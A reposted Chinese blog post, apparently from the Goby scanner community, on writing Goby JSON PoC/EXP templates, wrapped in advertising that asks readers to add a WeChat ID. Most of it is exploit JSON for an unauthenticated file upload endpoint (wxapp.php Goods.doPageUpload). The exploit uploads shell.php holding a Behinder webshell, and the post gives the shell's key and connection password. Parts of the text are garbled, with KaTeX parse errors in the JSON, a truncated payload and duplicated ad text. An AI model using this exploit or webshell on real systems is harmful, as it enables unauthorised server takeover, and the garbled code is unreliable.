技术分享 Json 编写 PoC&amp；EXP 遇到的那些坑_poc查询语法错误 goby(1)

先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新Golang全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上Go语言开发知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

如果你需要这些资料，可以添加V获取：vip1024b （备注go）

正文

“type”: “group”,
“operation”: “AND”,
“checks”: [
{
“type”: “item”,
“variable”: “KaTeX parse error: Expected 'EOF', got '}' at position 52: …200", "bz": "" }̲, { "type": "it…body”,
“operation”: “contains”,
“value”: “image_o”,
“bz”: “”
}
]
},
“SetVariable”: [
//这里需要设置两个变量,通过正则匹配返回，为上传文件的路径
“urlDir|lastbody|regex|image_o”:“.*goods\\/(.*?)\\/.*”“,
“urlDir2|lastbody|regex|image_o”:”.*goods\\/.*\\/(.*?)“”
]
},
{
“Request”: {
“method”: “GET”,
//这里调用上面的两个变量去发送GET请求
“uri”: “/Uploads/image/goods/{{{urlDir}}}/{{{urlDir2}}}”,
“follow_redirect”: false,
“header”: {
“Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate, br”,
“Connection”: “keep-alive”,
“Upgrade-Insecure-Requests”: “1”
},
“data_type”: “text”,
“data”: “”
},
“ResponseTest”: {
“type”: “group”,
“operation”: “AND”,
“checks”: [
{
“type”: “item”,
“variable”: “KaTeX parse error: Expected 'EOF', got '}' at position 52: …200", "bz": "" }̲, { "type": "it…body”,
“operation”: “contains”,
“value”: “e165421110ba03099a1c0393373c5b43”,//判断页面是否有该md5值
“bz”: “”
}
]
},
“SetVariable”: []
}
],

这里需要说一下下面的两句正则

“urlDir|lastbody|regex|image_o”:“.*goods\\/(.*?)\\/.*”“,
“urlDir2|lastbody|regex|image_o”:”.*goods\\/.*\\/(.*?)“”

因为输出的文件地址是 //Uploads/image/goods/2021-05-27/0206254881620132.php 这样子的

如果写成这样

直接调用发送 GET 请求为 %5C/image%5C/goods%5C/2021-05-27%5C/0206254881620132.php

这种请求会返回404

所以必须将 \ 去掉，已知文件的路径除了最后的上传日期和文件名在变化，其他不变，所以前面路径可以写死，通过正则取到日期和文件名进行组合请求。

注意：如果使用 json 编写，\ 这里必须通过两个 \ 匹配，否则匹配不到

“urlDir|lastbody|regex|image_o”:“.goods\/(.?)\/.*”" 取出日期，结果为 2021-05-27

“urlDir2|lastbody|regex|image_o”:“.goods\/.\/(.*?)”" 取出文件名 结果为 0206254881620132.php

然后通过 “uri”: “/Uploads/image/goods/{{{urlDir}}}/{{{urlDir2}}}” 请求则返回成功

PoC 部分写完，接下来看 EXP 部分就比较简单了，

“ExploitSteps”: [
“AND”,
{
“Request”: {
“method”: “POST”,
“uri”: “/wxapp.php?controller=Goods.doPageUpload”,
“follow_redirect”: false,
“header”: {
“Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate, br”,
“Connection”: “keep-alive”,
“Upgrade-Insecure-Requests”: “1”,
“Content-Type”: “multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs”
},
“data_type”: “text”,
“data”: “\n------WebKitFormBoundary8UaANmWAgM4BqBSs\nContent-Disposition: form-data; name=“upfile”; filename=“shell.php”\nContent-Type: image/gif\n\n<?php\n@error\_reporting(0);session\_start();$key=\"e45e329feb5d925b\";$\_SESSION['k']=$key;$post=file\_get\_contents(\"php://input\");if(!extension\_loaded('openssl')){$t=\"base64\_\".\"decode\";$post=$t($post.\"\");for($i=0;$i

直接上传 shell，这里的 data 数据还是通过 Burp 直接复制即可，通过 Goby 的图形化界面复制进去会自动生成换行符之类的，Exploit 部分可以先将数据通过 PoC 部分的图形化界面生成再复制进下面 Exploit 的 json 中。

图片下方为测试截图

这里因为需要输出 shell 地址和连接方式，并且要去掉 \，这样的话就需要变量或者字符串拼接… 一直没测试成功，就通过 expParams 设置了一下显示信息…

“ExpParams”: [
{
“name”: “webshellinfo”,
“type”: “textarea”,
“value”: “Using Behinder_v3.0 connection, password is rebeyond”,
“show”: “”
}
],

但是这样是不合规的 - -，因为 ExpParams 不是当做输出信息来用的，而是为了给 EXP 传参用的。最后问了 Goby 的师傅说目前使用 json 编写要想在 output 处实现这样的需求是不行的，想要实现的话只能使用 go 来编写了。

0×03 总结

-.- 编写过程中还是遇到了很多问题，大部分算是解决了，当然一些需求还是需要用 go 写，希望能帮助还不会 go 语言的小伙伴们通过 json 去编写 PoC/EXP。最后感谢师傅们的指导~~~

如果表哥/表姐也想把自己上交给社区（Goby 介绍/扫描/口令爆破/漏洞利用/插件开发/ PoC 编写等文章均可）图片，欢迎投稿到我们公众号，红队专版等着你们~~~

文章来自Goby社区成员：HuaiNian，转载请注明出处。

下载Goby内测版，请关注公众号：Gobysec

下载Goby正式版，请访问官网：http://gobies.org

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以添加V获取：vip1024b （备注Go）

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

需要这份系统化的资料的朋友，可以添加V获取：vip1024b （备注Go）
[外链图片转存中…(img-4ZKtCJs0-1713553641483)]

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！